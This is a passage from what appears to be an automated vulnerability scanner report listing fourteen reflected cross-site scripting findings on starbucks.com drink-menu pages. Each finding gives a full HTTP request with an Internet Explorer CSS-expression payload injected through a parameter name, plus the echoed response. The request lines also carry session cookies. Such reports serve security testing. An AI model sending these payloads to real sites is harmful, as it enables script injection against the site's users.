Date: Tue, 08 Feb 2011 03:31:48 GMT
Connection: close
Content-Length: 41575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style="x:expression(alert(1))"8d2325f8a6d=1"/>
...[SNIP]...

2.107. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/white-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5391b"style="x:expression(alert(1))"a19b060ce42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/chocolate/white-hot-chocolate?5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:26 GMT
Connection: close
Content-Length: 41166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate?5391b"style="x:expression(alert(1))"a19b060ce42=1"/>
...[SNIP]...

2.108. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-americano

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f255"style="x:expression(alert(1))"4510f38bf85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caffe-americano?6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:09 GMT
Connection: close
Content-Length: 42932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-americano?6f255"style="x:expression(alert(1))"4510f38bf85=1"/>
...[SNIP]...

2.109. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b40a7"style="x:expression(alert(1))"30887b94fb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caffe-latte?b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:55 GMT
Connection: close
Content-Length: 42713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-latte?b40a7"style="x:expression(alert(1))"30887b94fb0=1"/>
...[SNIP]...

2.110. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45914"style%3d"x%3aexpression(alert(1))"d584cd48a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45914"style="x:expression(alert(1))"d584cd48a51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caffe-mocha?45914"style%3d"x%3aexpression(alert(1))"d584cd48a51=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:49 GMT
Connection: close
Content-Length: 43114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-mocha?45914"style="x:expression(alert(1))"d584cd48a51=1"/>
...[SNIP]...

2.111. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cappuccino

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e145"style="x:expression(alert(1))"9afccd69e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/cappuccino?7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:17 GMT
Connection: close
Content-Length: 42857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cappuccino?7e145"style="x:expression(alert(1))"9afccd69e4b=1"/>
...[SNIP]...

2.112. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-brulee-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fbaa"style="x:expression(alert(1))"edc31d198d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caramel-brulee-latte?9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:22 GMT
Connection: close
Content-Length: 43406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte?9fbaa"style="x:expression(alert(1))"edc31d198d3=1"/>
...[SNIP]...

2.113. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46c9c"style="x:expression(alert(1))"2b341b0daca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caramel-macchiato?46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:08 GMT
Connection: close
Content-Length: 43191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato?46c9c"style="x:expression(alert(1))"2b341b0daca=1"/>
...[SNIP]...

2.114. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f06"style%3d"x%3aexpression(alert(1))"edbeba63995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20f06"style="x:expression(alert(1))"edbeba63995 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/cinnamon-dolce-latte?20f06"style%3d"x%3aexpression(alert(1))"edbeba63995=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:18 GMT
Connection: close
Content-Length: 43087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte?20f06"style="x:expression(alert(1))"edbeba63995=1"/>
...[SNIP]...

2.115. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/eggnog-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5fbe1"style="x:expression(alert(1))"947cd8ab9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/eggnog-latte?5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:06 GMT
Connection: close
Content-Length: 43144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/eggnog-latte?5fbe1"style="x:expression(alert(1))"947cd8ab9f7=1"/>
...[SNIP]...

2.116. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-con-panna

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 308a1"style="x:expression(alert(1))"67cfbbd6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/espresso-con-panna?308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:10 GMT
Connection: close
Content-Length: 42380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna?308a1"style="x:expression(alert(1))"67cfbbd6d45=1"/>
...[SNIP]...

2.117. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fec3e"style="x:expression(alert(1))"7a8ae9aecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/espresso-macchiato?fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:13 GMT
Connection: close
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato?fec3e"style="x:expression(alert(1))"7a8ae9aecf=1"/>
...[SNIP]...

2.118. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-shot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1525"style="x:expression(alert(1))"c72de6024ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/espresso-shot?c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:07 GMT
Connection: close
Content-Length: 42260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-shot?c1525"style="x:expression(alert(1))"c72de6024ef=1"/>
...[SNIP]...

2.119. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/flavored-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dceb"style="x:expression(alert(1))"01f34e806e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/flavored-latte?5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:40 GMT
Connection: close
Content-Length: 42615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/flavored-latte?5dceb"style="x:expression(alert(1))"01f34e806e=1"/>
...[SNIP]...

2.120. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/gingerbread-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb272"style="x:expression(alert(1))"511c9e6d392 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/gingerbread-latte?fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:26:15 GMT
Connection: close
Content-Length: 43423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
